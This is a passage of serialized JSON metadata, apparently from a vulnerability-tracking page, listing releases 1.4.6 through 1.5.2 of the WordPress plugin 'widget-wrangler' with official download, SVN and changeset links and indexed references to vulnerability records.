:954,"is_current":49},"1.5.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.1.5.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F1.5.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F1.5.1&new_path=%2Fwidget-wrangler%2Ftags%2F1.5.2",[955],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":957,"download_url":958,"svn_tag_url":959,"released_at":38,"has_diff":49,"diff_files_changed":960,"diff_lines":38,"trac_diff_url":961,"vulnerabilities":962,"is_current":49},"1.5.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.1.5.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F1.5.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F1.5&new_path=%2Fwidget-wrangler%2Ftags%2F1.5.1",[963],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":965,"download_url":966,"svn_tag_url":967,"released_at":38,"has_diff":49,"diff_files_changed":968,"diff_lines":38,"trac_diff_url":969,"vulnerabilities":970,"is_current":49},"1.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.1.5.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F1.5\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwidget-wrangler%2Ftags%2F1.4.6&new_path=%2Fwidget-wrangler%2Ftags%2F1.5",[971],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":973,"download_url":974,"svn_tag_url":975,"released_at":38,"has_diff":49,"diff_files_changed":976,"diff_lines":38,"trac_diff_url":38,"vulnerabilities":977,"is_current":49},"1.4.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.1.4.6.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwidget-wrangler\u002Ftags\u002F1.4.6\u002F",[],[978],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38}]